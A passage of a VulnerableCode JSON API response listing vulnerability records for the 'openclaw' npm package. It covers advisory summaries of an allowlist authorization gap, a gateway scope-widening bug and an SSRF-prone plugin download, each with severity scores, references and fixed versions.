                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "GHSA-92jp-89mq-4374"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv6g-7gs9-pfan"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89754?format=api",
            "vulnerability_id": "VCID-nw4r-wjgs-8qc1",
            "summary": "OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes\n## Impact\n\n/allowlist omits owner-only enforcement for cross-channel allowlist writes.\n\nAn authorized non-owner sender could attempt allowlist writes against a different channel.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41910",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2513",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25179",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25193",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41910"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41910",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41910"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vc32-h5mq-453v",
                    "reference_id": "GHSA-vc32-h5mq-453v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vc32-h5mq-453v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41910",
                "GHSA-vc32-h5mq-453v"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nw4r-wjgs-8qc1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89820?format=api",
            "vulnerability_id": "VCID-p7gx-9usz-yyew",
            "summary": "OpenClaw: Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`\n## Impact\n\nGateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`.\n\nPlugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.1.29`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42429",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20475",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20424",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20463",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42429"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42429",
                    "reference_id": "CVE-2026-42429",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42429"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4f8g-77mw-3rxc",
                    "reference_id": "GHSA-4f8g-77mw-3rxc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4f8g-77mw-3rxc"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication",
                    "reference_id": "openclaw-privilege-escalation-via-gateway-plugin-http-authentication",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42429",
                "GHSA-4f8g-77mw-3rxc"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7gx-9usz-yyew"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89521?format=api",
            "vulnerability_id": "VCID-p7me-4bzz-83cm",
            "summary": "OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection\n## Summary\nMarketplace Plugin Download Follows Redirects Without SSRF Protection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still uses a bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and being fixed only on main does not change that shipped SSRF exposure.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41297",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13336",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13378",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13373",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41297"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41297",
